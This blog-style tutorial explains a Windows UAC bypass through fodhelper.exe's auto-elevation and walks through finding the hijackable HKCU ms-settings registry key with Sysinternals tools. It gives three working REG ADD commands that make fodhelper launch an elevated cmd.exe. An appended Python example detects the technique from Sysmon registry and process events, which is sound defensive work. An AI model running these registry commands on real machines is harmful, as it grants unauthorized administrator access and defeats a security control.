Offensive Windows ~ User Account Control (UAC) Bypass

Local Privilege Escalation with fodhelper.exe

In this 3rd part of "Offensive Windows", I'll be writing about a local privilege escalation possibility that exists in the application fodhelper.exe!

This vulnerability exists because fodhelper.exe requires administrative privileges to launch, and if the user doesn't have them, it automatically elevates its privileges without showing the user the usual UAC prompt!

This can be abused to make another application, such as an admin command prompt shell, launch with the permissions fodhelper.exe has.


Locating Vulnerability

C:\Windows\System32\fodhelper.exe

The first step would be to launch the application and monitor for any abnormal activity, which doesn't seem to occur with my install of Windows. The next step would be to scan the application's binary with sigcheck.exe. Sigcheck is part of Microsoft's Sysinternals Suite, which can be downloaded for free.

C:\Tools\SysinternalsSuite>sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

Here we are able to see that the Requested Execution Level is Administrator and AutoElevate is set to True. This is exactly what we are going to exploit. Moving on, we are going to use Procmon.exe, another application that comes packaged with Microsoft's Sysinternals Suite.

C:\Tools\SysinternalsSuite\Procmon.exe

Running fodhelper.exe with Procmon open shows all the actions and tasks that fodhelper attempts to execute. With the help of the following filters, we are able to identify a few registry keys that are queried by fodhelper.exe but do not exist.

The filters are for:

  • Monitoring the process = fodhelper.exe
  • Checking the Operation for REG (registry operations)
  • Checking the Result = NAME NOT FOUND
  • Checking the Path = HKCU [HKEY_CURRENT_USER]

When fodhelper.exe is relaunched with Procmon running, we can clearly see that fodhelper is requesting a non-existent key: HKCU\Software\Classes\ms-settings\Shell\Open\command.

Exploitation

To take advantage of this, we create a new key at that path and set cmd.exe as the value it opens. The commands are:

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

In order, these commands:

  • Create a new key
  • Specify Value & Type
  • Set the Value to open up cmd.exe silently

Now, once we open fodhelper, the following will happen.

We can see that an admin command prompt shell has opened up in the background and we now have full system-wide access! Privesc donzo!
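
From the defender's side, both steps above leave telemetry: the write to the HKCU ms-settings command key, and a process whose parent is fodhelper.exe. The following is an added example, not code from the original post. It assumes Sysmon events (IDs 1, 12, 13) already parsed into dicts keyed by Sysmon field names, and the sample events and SID are constructed.

```python
import re

# Hijack key under any user hive. Sysmon logs HKCU as HKU\<SID>, and
# Software\Classes may appear as HKU\<SID>_Classes (assumption: both handled).
HIJACK_KEY = re.compile(
    r"^HKU\\[^\\]+?(?:\\Software\\Classes|_Classes)"
    r"\\ms-settings\\shell\\open\\command(?:\\|$)", re.IGNORECASE)

def detect(events):
    """Scan time-ordered Sysmon-style events and return a list of findings."""
    findings, staged = [], False
    for ev in events:
        if ev["EventID"] in (12, 13) and HIJACK_KEY.match(ev["TargetObject"]):
            staged = True  # remember that the handler key was touched
            findings.append({
                "rule": "ms-settings handler written in HKCU",
                "severity": "medium",
                "evidence": f'{ev["TargetObject"]} = {ev.get("Details", "")}'})
        elif (ev["EventID"] == 1
              and ev["ParentImage"].lower().endswith(r"\fodhelper.exe")):
            # Heuristic (assumption): review any child of fodhelper.exe and
            # escalate when the key write was seen earlier in the stream.
            findings.append({
                "rule": "process spawned by fodhelper.exe",
                "severity": "high" if staged else "medium",
                "evidence": f'{ev["Image"]} ({ev.get("IntegrityLevel", "?")})'})
    return findings

# Constructed sample events (not captured from a real host).
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
KEY = "HKU\\" + SID + r"_Classes\ms-settings\Shell\Open\command"
REG = r"C:\Windows\System32\reg.exe"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": REG, "TargetObject": KEY + r"\DelegateExecute",
     "Details": "(Empty)"},
    {"EventID": 13, "Image": REG, "TargetObject": KEY + r"\(Default)",
     "Details": "cmd.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\notepad.exe",
     "TargetObject": "HKU\\" + SID + r"\Software\Microsoft\Notepad\iWindowPosX",
     "Details": "DWORD (0x00000064)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\fodhelper.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "High"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f'[{f["severity"]}] {f["rule"]}: {f["evidence"]}')
```

The registry rule alone fires before fodhelper.exe is ever started, so it is the earlier of the two signals.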